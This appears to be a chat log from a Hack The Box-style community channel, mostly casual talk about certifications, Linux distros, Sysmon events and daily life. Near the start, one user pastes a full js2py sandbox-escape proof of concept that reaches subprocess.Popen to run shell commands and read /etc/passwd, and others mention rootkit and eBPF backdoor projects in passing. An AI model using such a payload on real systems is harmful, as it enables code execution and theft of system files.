#general

1 messages Β· Page 438 of 1

mystic harbor
warped plank
green kite
#

hello chat

#

hows it going people

dusky jacinth
#

Warhammer sunglas

open vigil
#

good morning y'all

green kite
#

heya

#

hows it going

supple plume
burnt obsidian
#

can i get the working code for code part two machine

supple plume
#

Like literally you can see the writeup

#

Or it retires in 2 days

#

I think

burnt obsidian
#

but the code dosen't work

supple plume
#

Mmm

burnt obsidian
#

could you please help with that

supple plume
#

I'm a bit busy rn

#

Do you know how to code?

burnt obsidian
#

nope

supple plume
#

That's the first problem

#

You need to understand what is the attack vector and why does it happen

#

You can copy paste payloads and get the flag but that is worthless

burnt obsidian
#

import js2py
from sys import version

payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator; kcalc; "
let hacked, bymarve, n11
let getattr, obj

hacked = Object.getOwnPropertyNames({})
bymarve = hacked.getattribute
n11 = bymarve("getattribute")
obj = n11("class").base
getattr = obj.getattribute

function findpopen(o) {
let result;
for(let i in o.subclasses()) {
let item = o.subclasses()[i]
if(item.module == "subprocess" && item.name == "Popen") {
return item
}
if(item.name != "type" && (result = findpopen(item))) {
return result
}
}
}

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
n11
"""

def test_poc():
etcpassword_piece = "root❌0:0"
result = ""
try:
result = repr(js2py.eval_js(payload))
except Exception:
return False
return etcpassword_piece in result

def main():
if test_poc():
print("Success! the vulnerability exists for python " + repr(version))
else:
print("Failed for python " + repr(version))

if name == "main":
main()

supple plume
#

Vro

burnt obsidian
#

yes

supple plume
#

Understand this code

#

Or join THM

burnt obsidian
#

alr

terse dirge
#

holyshit copilot is so insanely schizophrenic

supple plume
#

I like to use clankers sometimes but this technology is dumb

supple plume
west venture
#

Please

supple plume
west venture
#

Wsp

molten bobcat
supple plume
molten bobcat
#

alright im done now

dusky jacinth
#

heeeell yeah

molten bobcat
#

I'm so tired

#

But its done

terse dirge
molten bobcat
#

Y'all being nasty

supple plume
west venture
#

Sometimes you just wanna jump off a giraffe

supple plume
#

Exactly

molten bobcat
#

I turned in my exam

molten bobcat
#

I'm probably just gonna head to bed

terse dirge
molten bobcat
#

I've been working on it since noon today so.. 14 hours?

cloud osprey
#

if you dont pass you are dead to us

molten bobcat
#

I mean

#

I already have a job in cybersecurity so like

cloud osprey
#

but blue team

molten bobcat
#

This was just to goof off and learn somethin

terse dirge
#

I really don't wanna look at cases in elastic. I already know that there's like 8 Palo Alto IPs scanning our shit AngryCry

green kite
#

heya cealdo

molten bobcat
#

If I never have to use elastic or splunk again it'll be too soon

#

I am now deadly with both of them and I hate everything

green kite
#

finished up your exam cloud?

molten bobcat
#

Yeah

green kite
#

congrats πŸ™‚ now the waiting game begins

terse dirge
molten bobcat
#

No thanks

terse dirge
green kite
molten bobcat
#

I think I'm about to bust out the classic chips and peanut butter as a treat

terse dirge
#

All I know is they're like kernel modules but more restricted and on a VM in the kernel

terse dirge
terse dirge
warped plank
warped plank
supple plume
#

I just had a bad pizza from supermarket

#

Not recommended

cloud osprey
supple plume
supple plume
sturdy thistle
#

morning

cerulean knoll
acoustic pelican
#

hey

#

does amazon offer good warranty ?

green kite
#

uh, I think it depends on the seller and the country you are in

supple plume
#

memento mori

green kite
#

sup echo

supple plume
#

hi

#

you know what is funny

#

I replaced myself at work

green kite
#

why?

supple plume
#

I have designed automated pipelines with mcps and rules so I can gigaiberturbo vibe code, the clanker works following my coding guidelines and constantly runs the strict eslint rules so I just do 45 min of code review during my work shift

#

my boss is super happy with the results and the code is not bad since I make sure it is good enough

terse dirge
supple plume
#

I use the rest of the time to grind htb

#

the only problem is the office days

terse dirge
#

idk if I like them anymore kek I can't get a proper hack workin for reading files that other users own

supple plume
#

we are ahead of the schedule

terse dirge
#

my old rootkit is supposedly very unsafe according to chatgpt kek

supple plume
#

literally he gives me work to do that is just like remaking the companies website or some stupid stuff

#

which is already done

#

I just upload the commits strategically to make it look like I am working hard

green kite
#

lol!

supple plume
#

yeah

green kite
#

hopefully he doesnt read this chat then

supple plume
#

yeah

supple plume
green kite
#

I am okay πŸ™‚ just a tad busy with work and trying to stay mentally healthy

supple plume
#

TDD helps a lot with mental health

green kite
#

yeah

supple plume
#

xd

warped plank
supple plume
#

a program that runs your program to see if it does what is supposed to do

#

before you even code it

warped plank
supple plume
#

I love it

#

once I wrote 3000 tests by hand before AI

#

after that I started to love it

#

frees you up from testing most of the time

#

reliability is king

#

time to hack giveback πŸ’’

#

I have a meet soon

#

too bad I can't automatize that yet

warped plank
supple plume
#

xd

abstract orchid
#

hi guys

#

i need help

#

It's been trying to turn on for 5 minutes.

#

Does anyone know if the VPN is working?

warped plank
abstract orchid
warped plank
muted olive
#

with that particular machine, turning it off might be a better solution

terse dirge
#

ight, ebpfs suck they'd be neat for a backdoor tho def next project

#

I'll just fix my rootkit to be stable I guess

#

Imma use kretprobes so I can return values from my probes to stop other function calls

austere sinew
#

@sturdy thistle ping

#

I SAW THAT @mystic harbor

mystic harbor
sturdy thistle
austere sinew
sturdy thistle
#

damn u

terse dirge
gray wraith
terse dirge
#

It shouldn't be that bad anymore since I know now to switch writing system calls on and switching it back to read

sturdy thistle
#

@austere sinew now i beat you

#

no real violence though

austere sinew
sturdy thistle
#

NO VIOLENCE applied

#

guess it's coffee time

austere sinew
graceful pendant
weak kernel
#

Hii guys!
Solving snoopy machine on HTB.
What am I missing Abt previlege escalation with git apply ?
I keep thinking in terms of bypassing permission but I feel that framing is wrong

sturdy thistle
#

and if you wanna chat with @austere sigil then just stay here

austere sinew
sturdy thistle
#

or with @austere sinew

austere sigil
sturdy thistle
#

nice

austere sigil
sturdy thistle
#

yes please

austere sigil
#

model: pink lady from 2026

sturdy thistle
#

oh nice

#

i love them

boreal pike
#

UwU.

zealous charm
fiery copper
subtle plover
#

Hi

subtle plover
#

Long time no c

frigid mountain
#

hiyo

sturdy thistle
austere sigil
cunning marsh
#

I am looking for some people to Join my CTF team

exotic pendant
frigid mountain
cunning marsh
exotic pendant
#

Frosto learning bioinformatics

austere sigil
sturdy thistle
#

deus frosto

exotic pendant
#

Hacking lab equipment

#

And phd people teaching me

#

That I work with

sturdy thistle
#

WHEN u teach me

exotic pendant
supple plume
exotic pendant
#

Combine hacking and dna hacking

austere sigil
#

Yeah, nothing's bad going to happen

supple plume
exotic pendant
#

I uploaded my dna and protein strands to the dark web

#

Obv smart decision

austere sigil
#

we are doomed

exotic pendant
#

March 31 offsec is releasing OSAI

#

I’m going to be the first to get it

supple plume
#

Vro is blooding certs peepoSmoker

#

I just can bleed my knees

exotic pendant
#

March 32 scheduling my exam(is a joke)

#

April 1st

austere sigil
#

I'm cooking big fat steak today

exotic pendant
#

I’m still eating my diet food

austere sigil
#

pizza?

exotic pendant
#

I wish

#

Chicken beef eggs rice sweet potato

woeful totem
exotic pendant
#

Is my main sources

#

Plex bug almost done prayge

#

They’re working on a fix

#

Last person they gave money, 4x life time vouchers and merch

austere sigil
#

I reported 3 high findings and they fixed it all in 3 hours

#

swag coming up

exotic pendant
#

MarioWooDance time for gym

austere sigil
austere sigil
exotic pendant
#

I reported an RCE for plex

austere sigil
#

plex media server?

exotic pendant
#

Plex client

#

I’ve never used plex

#

I just asked ChatGPT for a good target

#

And then downloaded, poked and got RCE

austere sigil
#

the media server thingy?

#

the same plex?

exotic pendant
#

Yeah

#

Plex tv

austere sigil
#

cool

woven needle
#

How do the HTB admins decide which machines to retire?

frozen zinc
woven needle
#

No serious answer?

devout sail
#

Whenever new one gets released

frozen zinc
#

Look at you

exotic pendant
woven needle
#

So they dont factor in number of user/root owns? Just a little confused why imagery got retired but expressway is still up

frozen zinc
#

A medium box release retires the oldest medium box release

devout sail
muted olive
#

@exotic pendant question
if youre having skill issues setting up some app to test a bug, is implementing the exact same logic in your own app and running a POC against it counted?

woven needle
frozen zinc
exotic pendant
#

Just make sure at the end you got reachability to the code when hitting for real

woven needle
#

Dont worry mate, thx 4 answering my question guys

exotic pendant
#

So ye I isolate functions to test sometimes

young glen
#

Sounds cool

muted olive
#

I copy pasted the vuln file into my POC and asan showed the crash

exotic pendant
#

Prob some other conditions somewhere else in the code

muted olive
#

There was none in that entire module at least

#

other ones idk

signal mica
#

thats above your paygrade son

rancid totem
#

Hey!!

upbeat tangle
slender torrent
#

hola

tame ether
#

hola

exotic pendant
#

Aye it’s Friday

muted olive
#

Apparently you can execute C code in Claude now

#

cool feature

half vine
#

Hy

rancid totem
#

Found a critical API Endpoint in my company, I do not work with Cybersecurity // Developer team but I interact with customers a lot "approximately 250 customers / day", and they offered me a job in Dev Team, haven't heard anything for 11 days, I think this is what the interviews looks like.

fiery copper
lofty warren
gray wraith
stable tiger
#

this isnt anything useful i just got bored

#

use it, or don't

supple plume
stable tiger
manic anvil
#

waz chatgpt is a bad liar

stable tiger
#

it's literally an api caller that just mangles shit together

#

😭

manic anvil
#

ask him if he remember anything from previous chats in new chats , says no
mentions things from older chat anyone

#

mf anytime i ask about something in pentesting he mention HTB , i only mentions HTB once in like 4 months

#

kek i even mentioned THM but he always just bring HTB

stable tiger
#

free u bro

supple plume
#

no time for this shit gotta lock in

stable tiger
#

that's crazy

#

@supple plume are you saying it's vibecoded because of the optimized: line 😭

#

that's there because it was fucking crashing with how i handled json origianlly 😭😭😭😭😭😭😭😭😭😭😭😭

supple plume
#

I mean only the clankers comment a function like this

#

but I guess you wanted to write that comment

#

so I know that function called generate that could be called generateKey means generate key

stable tiger
#

no it was just named something diff beforehand 😭

#

but ur right, i vibecoded a 150 line key generator that just mangles shit together after an API call 😭 😭 😭 😭 😭 😭 😭 😭 😭 😭 😭 😭

loud epoch
#

// Main worker function πŸ—£οΈ

stable tiger
#

im finna be flamed for my commenting now

supple plume
#

it's ok you did most than all these other yappers around here

stable tiger
#

i do vibecode python tho. bcos fuck python

supple plume
#

I was messing with you

#

I vibecode sometimes

stable tiger
#

i spent 3 hours researching how to optimise it

supple plume
#

that's what matters

stable tiger
#

so the vibecode accusation broke me πŸ₯€

supple plume
#

look at my profile

stable tiger
#

rs

supple plume
#

CPDY

#

galactical yapping lord

#

certified

stable tiger
#

sadge_business yk the funny part abt this is

#

I need to rewrite it in C sadge_business

supple plume
#

uh

#

that sucks

#

why do you need to do that

stable tiger
#

for a builder exe

#

i mean i could write that in go but im not that familiar with windows specific golang

supple plume
#

so, now that I look at it, it is just an api call and a little script to wrap it and configure it

stable tiger
#

that's what i said

#

the thing that took a minute was figuring out how to avoid using %

supple plume
#

is it required for the buidler?

#

I have no idea btw

#

I try to stay away from windows

stable tiger
#

these two lines

#

i forgot stats and had to relearn rejection sampling

heady sage
#

I got a letsdefend thing

stable tiger
#

and i'd rather do that than gpt paste "how do i write this builder in go"

supple plume
heady sage
#

Blue Team training platform

supple plume
#

I know

#

but what thing you got

#

a subscription?

heady sage
#

I got a voucher for it

supple plume
#

cool

muted olive
#

htb acquired that thing recently

supple plume
#

I thought about gettin a sub I think there is cool content there but I already have a lot on my plate with htb

heady sage
#

I know Hades

zealous charm
#

let’s defend? Nah let’s attack!!

heady sage
#

Sometimes the best offense is a good defense

split patio
#

@heady sage yo bro

#

@heady sage wspp

heady sage
#

oh hey

split patio
split patio
heady sage
#

yes

split patio
west venture
#

I held a plank position for 7 minutes today

supple plume
loud epoch
west venture
#

Yeah

gray wraith
#

Arent lets Defender and htb working together

#

So u have access to their stuff as well

#

?

#

Pretty sure i read smth like "one account, two platforms"

supple plume
#

iirc

gray wraith
west venture
#

Is anyone else sort of fatigued by security practices?

I am honestly done with being all security conscious online. I don't wanna update my OS anymore, and I wanna download random.exe files from the internet and run them. Like fuck security bro it's so annoying

stable tiger
#

Plugging your ears doesn't change the problem

quartz willow
#

@lunar elm hi

fiery copper
edgy vapor
#

Kabob!

fiery copper
fiery copper
#

ok, Ill call you Kabob

#

anyway, why are you named that, is it a country specific name or something else?

#

Im asking cuz I didnt see the name before

loud epoch
#

kabob goes hard ngl

edgy vapor
#

KABOB

lofty warren
feral jackal
#

hi

#

guys

#

can I download the HTML pages of a module if I finish it?

tacit totem
#

Hii all!!

feral jackal
#

hi

tacit totem
#

I'm new here. Can you explain what you discuss here?

maiden anvil
#

anyone know where model settings are in lm studio's new UI? cant find them or docs telling where they are

#

@signal mica bad kitty

#

naughty!

feral jackal
#

I am naughty

maiden anvil
#

wth is going on in here

#

@zealous charm help

feral jackal
zealous charm
zealous charm
#

Any hacking today?

maiden anvil
#

help me anakin

feral jackal
#

sorry

maiden anvil
chrome tree
#

He's a crab. He''s a single server meal

maiden anvil
#

planning on finishing my CYD marauder project if my mailbox can get busted open

#

hbu @zealous charm any sick hacks today?

#

I saw debugger output yesterday somewhere

#

looked like you were doing something interesting πŸ‘€

feral jackal
#

you are a star

chrome tree
zealous charm
molten bobcat
#

I am exhausted

#

And I'm also sick

maiden anvil
feral jackal
chrome tree
maiden anvil
molten bobcat
#

The road to El Dorado was wildly beautiful

chrome tree
zealous charm
feral jackal
#

who is he

chrome tree
chrome tree
# feral jackal what?

I don't know, I'm just throwing random brainrot answers out there cause I'm over worked and exhausted. Staring at that clock trying to will it to go faster kek

feral jackal
#

i can't fix that

feral jackal
#

oh

#

can i chill with you

chrome tree
#

Ma'am, that's gonna be a no. This is my zen zone. prayge But feel free to shit post with me. Spread the brainrot, in a respecful way.

molten bobcat
#

They're

#

Quoting fuckin

molten bobcat
#

Blade runner 2049

#

They're not actually flirting

exotic pendant
#

πŸ˜„

molten bobcat
#

Basically how I'm feeling

#

I turned my exam in around 2:30am

chrome tree
# molten bobcat I turned my exam in around 2:30am

Try not to overthink it.prayge I'm sure you did great. revmusc Plus you still get a second attempt. Trust me if you don't get it the first time you'll get it the second. That's what happened to me with the CBBH when I took it.

cerulean bloom
cerulean bloom
#

my prediction lol

molten bobcat
#

I don't believe I will, no

#

This would be something I'd be proud to turn in for my real life job

#

Infact, it's probably more difficult than any single case I've ever done

chrome tree
#

Oh, I misunderstood, you're just exhausted from it. kek My bad

molten bobcat
#

I'm trying to describe it

#

As vaguely as possible

#

But uh

#

What my job lets me comfortably handle with teams of people working in harmony

#

I have to do alone, twice 😭

#

Which is why it took me from.. last Saturday until last night waz

chrome tree
#

Clouds a one man SOC. It's not AI you have to worry about taking your job it's Cloud. kek

chrome tree
#

Rudo coming out swinging. Bender

molten bobcat
#

I promise you the whole time I was working on my exam I kept thinking

#

God I miss my coworkers

#

"hey can you check out this host?"
"Sure thing dude!"

#

None of that

#

It's me, I'm asking myself for help

#

I require my highly experienced Australian friends to carry me thanks

signal mica
molten bobcat
#

Azo I finished

signal mica
#

ayo c1ouddd

#

finished what? the exam and turned it in?

#

soc

molten bobcat
#

Yeh

#

My CDSA exam

#

I turned it in last night

signal mica
#

man i wanna do that path so bad but i dont have the timeeee

#

also why have you even done it

#

isnt that like your job anyways

molten bobcat
#

I wanted to be better at my job

signal mica
#

so you have learned new things

molten bobcat
#

I have!

signal mica
#

neat

molten bobcat
#

Although if I see process injection or hollowing again I'm gonna throw up

signal mica
#

stop doing this to me

molten bobcat
#

CreateRemoteThread azo

signal mica
#

it feels like i have no cigarettes and you are livestreaming me a smoking facetime

molten bobcat
#

Stop it Patrick you're scaring him!

heady sage
signal mica
#

hello general chat , how do i experience time in polynomial matter, thanks in advance

molten bobcat
#

But also yeah it's a sysmon event

signal mica
molten bobcat
heady sage
#

Isn’t that a scammers GitHub

molten bobcat
#

Yes lmao

#

I love it so much I saved a bit

signal mica
heady sage
#

So there was this one dude in this server that kept shitting out buzz words called samaltman

alpine pumice
#

lmao he had a scam github?

#

that guy was an idiot

molten bobcat
#

Yessir

#

It was all ai coded and described slop

#

But was offering paid services for anyone who wanted to use his (paid software)

signal mica
#

ahh i remember now

heady sage
#

CREATE_SUSPENDED_PROCESS flag should ideally give you what you need

molten bobcat
#

Sysmon is more readily available than whatever that flag is sourced from

signal mica
molten bobcat
#

Oh no I like peak, whatever will I do

#

He's a generational talent

signal mica
#

yeah kendrick is cool

molten bobcat
#

Wild to hear an artist with this much range and soul

#

Makes the brain happy

heady sage
signal mica
#

i solved memento yesterday after 2 months

#

dope ass challenge

molten bobcat
#

CreateRemoteThread is event code 8

signal mica
#

take care mina san

molten bobcat
#

Event code 10 is ProcessAccess, which you'll see in stuff like memory access for LSASS dumping

heady sage
#

I was talking about Process Hollowing as well

molten bobcat
#

It'll have a correlating Event Code 1, ProcessCreate

#

Most tools call the process they want to hollow

#

Or inject

heady sage
#

Awesome thanks

molten bobcat
#

The elastic and splunk threat hunting modules are good for practicing this

#

Oh and

#

I don't know if it's ever like

#

Directly stated

#

But computers perform operations really, really fast when not told to pause

#

So it's actually normal to see things occuring within the same second as one another

meager kernel
#

hello

molten bobcat
#

There's variances of executions speeds depending on a shitload of factors but ultimately

#

Computers are quick and can do things very quickly

chrome tree
#

@molten bobcat Hey, have you ever done the SOC/Threat Hunting simulator on THM? I'm curious to know if it's any good.

west venture
#

Does anyone know a Linux distro that doesn't completely suck? I dualboot bc I have some mandatory stuff running on Linux and it always fucking breaks.

devout sail
#

mint

bold snow
#

is CBBH deactivated? I cant see it on htb website

sturdy thistle
#

It’s CWES now

bold snow
#

oh

#

what changed in modules? Just the name?

sturdy thistle
#

@austere sinew confirms it

austere sinew
sturdy thistle
#

That cbbh was renamed

austere sinew
#

ohhh

#

wait i need to stop procrastinating i need to do boxes otherwise a certain individual will kill me

sturdy thistle
#

Secret ping attempt was successful

#

WHO? Can we kill the person fist?

austere sinew
scenic maple
west venture
#

I haven't done boxes in months

#

And honestly nothing related to Cyber security or IT lol

exotic pendant
#

πŸ˜„

west venture
#

It utterly disgusts me

austere sinew
west venture
#

I will protect you

devout sail
#

Atleast RA used to give

sturdy thistle
#

This damn leg day

chrome tree
loud epoch
#

I kind doubt it's the distro that is the issue but idk smileW

chrome tree
#

It also has it's own windows management system too. Not sure about the "cosmic desktop" they're switching over to at some point. Also has it's own software store GUI as well as you can manage through apt.

west venture
loud epoch
west venture
#

Fedora

wanton dock
#

Meow I get it

loud epoch
#

I mean im #1 fedora hater but it's pretty stable from what I know

#

I dont think switching distro will resolve ur issues (whatever they are) but yeah

chrome tree
#

Pop OS also has strong nvidia support right out of the box. I haven't had to tune anything except for steam

west venture
#

Switching distros won't I need to switch OS's but first I need to recompile all port my projects for windows

maiden anvil
#

@zealous charm One man's dream can hold dominion over the entire world for one who dedicates his life to the forging of a single sword. While many can pursue their dreams in solitude, other dreams are like great storms blowing hundreds, even thousands of dreams apart in their wake. Men live and die by their dreams. But long after they have been abandoned they still smolder deep in men's hearts. Some see nothing more than life and death. They are dead, for they have no dreams.

chrome tree
#

If you want a linux distro that "just works" out of the box I can vouch for it. It's nothing special but it's quite stable. I dual boot so I can still run certain games under windows, but I spend most of my time in Pop as far as productivity goes.

west venture
#

Yeah I've been on Linux for 8 years now and I recently got a taste of windows for a week after years of not using... Yeah Linux is not beating that anytime soon

chrome tree
# gray wraith Did u debloat Windows smh?

Didn't come with much to begin with. I got a pro key, and figured I'd have to go through some crapware removal but it was very minimal. W11 is just shite in resource management. I run 20% of my ram in W11 idle. On Pop I'm at lik 3-4%. Underload I don't really go past 50 unless I'm running 2-3 vms at once.

gray wraith
chrome tree
gray wraith
#

We use wins at woek at sometimes stickynotes decides to eat 90% of the memory and almost crash the pc

chrome tree
gray wraith
chrome tree
# gray wraith Well, guess what we have here LOL

Well if you found any tips to bring that number down please let me know. kek Sometimes if I perform the Dell proprietary support update software it helps, but otherwise I think upgrades are in order. For my workstations at least. lol

#

It also doesn't help most of my staff keep 10+ chrome tabs open. mind_blown

gray wraith
#

This is crazy

chrome tree
gray wraith
#

Its awfully Microsoft slopped

#

Who tf uses bing? And the copilot addon?

chrome tree
#

One of my students almost just caused a fire with a chromebook charger. kek

upbeat tangle
upbeat tangle
vivid flower
vivid flower
#

You want that dxvk layer which popos doesnt have

chrome tree
vivid flower
#

Do you know what dxvk is

chrome tree
#

Nah, but I can look it up. Give me a second

vivid flower
#

One of the things steamos is pioneering is a translation layer between directx and vulkan

#

That is present in bazzite and enables faster framerates compared to running stuff in wine

#

Thats really the secret sauce that is making windows games run faster in linux

#

You want that

chrome tree
#

I don't use wine though. Yeah no this looks like it would save me time in tuning on pop os if I ever decided to switch to a linux gaming solely

#

I dual boot though

vivid flower
#

Thats fair

chrome tree
#

I found pop cause I wanted something more geared towards productivity

#

Just to have something stable

#

I have seen bazzite perform wonderfully for gaming though and have heard nothing but great things

vivid flower
#

I am more of the opinion that I'd rather have two different devices rather than trying to have one do everything machine

#

So I would sooner have a computer that I do work on and then another computer or steam deck for gaming

#

That's just me though

#

I know that bazzite sounds like some literal who os , but I really do think it's good

chrome tree
#

If I didn't have intel based hardware I would venture out more, but I feel nvidia is really limited when it comes to getting full performance from a linux based system.

#

What do you run as your daily driver? I'm curious. Just more so for productivity and regular computer work rather than gaming. @vivid flower

vivid flower
#

I daily drive a thinkpad x230 with coreboot

#

And im a console gamer

brittle quail
#

bro

#

why does kali freeze

#

after i close my laptop

vivid flower
#

I use this

chrome tree
vivid flower
# brittle quail after i close my laptop

Debian recently made a big change, now /tmp/ is mounted to ram and not all kali tools are updated to use /tmp/ responsibly. So if you dont have a lot of RAM or swap space freezes are more common now. My lappy has 16gb of ram and i gave myself 64gb of swap space because i was tired of dealing with it

vivid flower
#

So its both. It can be used to load an open source BIOS like SeaBIOS or tinycore

frozen zinc
brittle quail
meager kernel
#

@austere sinew

vivid flower
chrome tree
vivid flower
#

Oh yeah it boots so fast

chrome tree
#

So do you run any linux distros on the devices you have? Like mint, or arch, etc.?

vivid flower
#

I daily drive kali bare metal and run kali inside of a vm inside of kali brain_expand

vivid flower
#

I used to use qubes but now im trying to focus on my studies

#

Parrot SUCKS

chrome tree
chrome tree
# vivid flower Parrot SUCKS

I never took to it. After I tried kali it just seemed redundant to try parrot as it looked much like Kali already.

vivid flower
#

None of my red teaming tools work on parrot

#

They only support kali

chrome tree
vivid flower
#

Ghostwriter mostly

#

But there are also little things like i cant enable compatibility with old ciphers easily on parrot

#

But on kali you can just use kali-tweaks to do that

#

And afaik parrot doesnt have powershell and kali does

#

I need that for writing .kirbi tickets

chrome tree
#

I thought it did, but that might have just been the parrot machine that HTB had custom

vivid flower
#

Parrot does like 80% of the things i need it to do and its okay for learning and its okay for pwnbox and a lot of htb use case but kali is just the more mature ecosystem

chrome tree
vivid flower
#

Maybe im wrong about powershell i couldnt find it the last time i had parrot installed

#

Yes, i think so.

chrome tree
#

And what about black arch? blobthinking

#

jk

#

lol

#

I hate that thing

vivid flower
#

If you need to use some obscure tool that is only in AUR then blackarch could be useful

heady sage
#

Once I revert to an egg I must bury myself underground for three years. There my form matures.

vivid flower
#

I haven't run into that yet

molten bobcat
#

I gotta do some laundry and clean up the house

vivid flower
#

I do miss running tewisay-git on arch distros

chrome tree
#

I feel like if I'm going to use something like black arch I might as well just make an arch machine from scratch and install everything I want

#

I like pacman though

vivid flower
#

Yo! @molten bobcat how did your exam go

maiden anvil
brittle quail
#

how do i see command history

molten bobcat
#

The history command

chrome tree
vivid flower
brittle quail
#

bro..

#

none of the commands or anyhting i just did are in history

#

thats so annoying

molten bobcat
#

Probably because it's not enabled by default

brittle quail
#

no everythings there except for the commands i was using before it crashed

vivid flower
#

Iirc history doesnt index commands until u close terminal

heady sage
#

lol

molten bobcat
#

You didn't say your host crashed now did you

brittle quail
#

it didnt crash idk what happened

#

it just

#

kali just froze so i had to close and reopen

wanton dock
vivid flower
molten bobcat
#

Yeah I think you restarting a frozen machine isn't gonna have your shit saved lmao

brittle quail
#

thats annoying now i forget how i was doing the lab

meager kernel
#

@molten bobcat when getting CDSA results back?

molten bobcat
#

This is why you have notes on the side

molten bobcat
meager kernel
molten bobcat
#

Thank ya prayge

meager kernel
brittle quail
#

yea

#

ig u were right

#

sigh

heady sage
molten bobcat
#

🌽 laelVibe 🌽

#

Me rn

chrome tree
#

A frog of the corn?

vivid flower
#

Cdsa was hard for me bc i hadnt ever really done an investigation where i had to organically discover everything without an initial suggestion on where to start

#

The training material really doesnt ever really get you to that point

brittle quail
#

i did the openvpn command it keeps saying restart pause, 2 seconds

vivid flower
#

I will have to retake it sometime

#

Hope u passed @molten bobcat

young glen
#

Hope you passed as well

frozen zinc
brittle quail
#

i rememberd

#

see

#

its in my head

frozen zinc
#

gl

chrome tree
#

Better put it in your notes

frozen zinc
chrome tree
#

He ran out of the green and switched to yellow

wanton dock
#

im getting lit rn

frozen zinc
chrome tree
#

I'm just being a ball buster tho lol

frozen zinc
#

you win

loud epoch
chrome tree
#

Gonna be me right after I get out of work. pika

loud epoch
frozen zinc
chrome tree
#

How's your twin sister btw bandit? kek kek

molten bobcat
#

I finished my exam

frozen zinc
loud epoch
vivid flower
#

Did you find everything

loud epoch
#

now just waiting results ig?

chrome tree
frozen zinc
molten bobcat
loud epoch
molten bobcat
#

Gifs you can hear

loud epoch
#

fr lmao

molten bobcat
#

Gin

loud epoch
#

CLOUD

molten bobcat
#

Do you wanna watch cool video games

#

In vc

loud epoch
#

I REALLY can't rn

molten bobcat
#

Dang

loud epoch
#

maybe weekend yeah

molten bobcat
#

I work this weekend rip

loud epoch
#

I need to finish webapp for 3pm tmrw CRY

molten bobcat
loud epoch
#

no fun no fun

#

or maybe tnt

frozen zinc
#

bro what??

chrome tree
molten bobcat
molten bobcat
#

I took an astronomy course in college

frozen zinc
#

It have to be cool

molten bobcat
#

I also played a lot of Elite Dangerous lol

meager kernel
molten bobcat
#

I collected/sold nav data

meager kernel
#

Hopefully this doesn't get me banned or muted

austere sigil
#

πŸ‘€

meager kernel
#

Botmon

austere sigil
#

botmon it is

meager kernel
austere sigil
meager kernel
#

Good to hear that

austere sigil
#

everything I need and want works

meager kernel
#

I played a few CS2 games, it went well somehow

meager kernel
#

Same for me with Arch

#

Using LibreOffice is kind of a weird experience tbh

austere sigil
#

I'm using onlyoffice

#

good enough

meager kernel
#

Will check it out

austere sigil
#

looks exactly like Office

meager kernel
austere sigil
meager kernel
#

Good to hear that

#

Peak game franchise

#

One of my favourite

frozen zinc
austere sigil
#

incredible games for sure

meager kernel
#

Arkham Knight, even 11 years later, still one of the best games to ever exist

meager kernel
#

It feels like a movie

signal mica
#

nvm you sent this

austere sigil
#

it's dark as it should be

silver forge
#

yes.

austere sigil
#

yes.

signal mica
#

yes.

frozen zinc
#

yes.

upbeat tangle
#

yes.

silver forge
#

stop

chrome tree
#

no?

supple plume
#

yes.

silver forge
#

mods, I have nothing to do with the mayhem this time hmmmHug

austere sigil
#

understood.

chrome tree
#

Which platform? The lab platform, academy, etc.?

#

Click you're little icon in the top right hand corner, and select billing. After that you can scroll all the way down to update and change your payment method etc.

molten bobcat
#

It took me using

#

Some needle nose pliers

#

But I finally got the annoying tag out of my hoodie

frozen zinc
#

just burn it lol

molten bobcat
#

I've never once tried or seen anyone do that

#

So I'd be pretty clumsy at it lmao

#

I'd end up with a burnt up hoodie

frozen zinc
#

Are we talking about the same? like the tags from shirts and stuff no? behind the neck?

chrome tree
#

He wants you to become the human torch.

molten bobcat
#

Yeah

frozen zinc
#

I burn them

molten bobcat
#

I've never once burned them

#

I tear them out like an animal lol

frozen zinc
#

Lol i burn a lot of things

molten bobcat
#

I burn cardboard

#

In a burn pit in my backyard

frozen zinc
#

No I mean for real, like the threads from jerseys

molten bobcat
#

I know lol

frozen zinc
#

xD

molten bobcat
#

It's one of those "things I've heard/read about, but have never first hand experienced it"

frozen zinc
#

Is also very efective for plastic in general

#

when you need to "cut" annoying plastic

molten bobcat
#

Ye

#

Just uh

#

Do so in an open space?

#

Idk how much you like huffing plastic fumes

frozen zinc
#

I guess Ive been a chef for so long xD

chrome tree
#

inhale the fumes, become smarter lol

silver forge
#

yes, burning plastic in the backyard in a pit waz

rapid badger
molten bobcat
#

I most certainly do not lmao

#

I only burn cardboard

ancient sequoia
#

uni ctf 2026 when

frozen zinc
#

Lol one thing is to slightly use fire to make it soft and break it and another one is to make a fire out of plastic

molten bobcat
#

Burning plastic bad for you/the environment

frozen zinc
#

what about polyester and nylon?

molten bobcat
#

I may not be gods greenest little gremlin but I for sure believe in "sumthin" being better than "nothin"

silver forge
#

or dead zombies hmmmHug

molten bobcat
#

Aren't zombies undead

silver forge
#

don't matter, they burn

frozen zinc
#

yes.

young glen
#

It's the lich king

silver forge
#

it burns, too

#

everything burns

frozen zinc
#

Someone have been burning corn today also....

frozen zinc
#

ahahah

#

I KNEW IT

molten bobcat
#

🍿 ❓

frozen zinc
#

sure sure

#

the munchies mate

supple plume
#

I've been hacking too much today

rancid snow
#

Untrue

supple plume
rancid snow
supple plume
#

took me almost 12 to complete the fuckass giveback

#

time to stop

#

@mystic harbor halloweenknife

leaden jolt
#

a

vivid flower
graceful pendant
#

are you a public rpc node? cus i wanna hammer ur endpoint

rapid badger
vivid flower
vivid flower
zealous pond
#

What book would you buy for any amount if it existed?

cerulean knoll
#

How to make money πŸ˜‚

silver forge
#

the book of souls

cerulean knoll
zealous pond
#

I am the name of the book

cerulean knoll
zealous pond
#

Like in the format 'how to do ___ without (painpoint) in __ time.

supple plume
cerulean knoll
#

Well played 😏

loud epoch
#

@molten bobcat scale 1 to 10 how schizo have you been in the past 2 weeks

sharp beacon
#

pleas

supple plume
#

Pleas peepoDonutLick

frail turtle
#

Everytime I walk past my cpts cert in my room i get an urge to come back to hacking

#

but that life was so hard ;c

#

i may come back after some bootcamp im goin through for backend dev

upbeat tangle
frail turtle
#

I didn't know ntlm was the problem

frail turtle
upbeat tangle
#

just play the game

frail turtle
#

I'll see what I can do how i could fit it in, you know it's like an itch, kinda like how one plays an mmo for some time idk

upbeat tangle
gray wraith
gray wraith
#

For fun, there is a chance to make some bonus money

upbeat tangle
#

burn yourself out, make 0 money

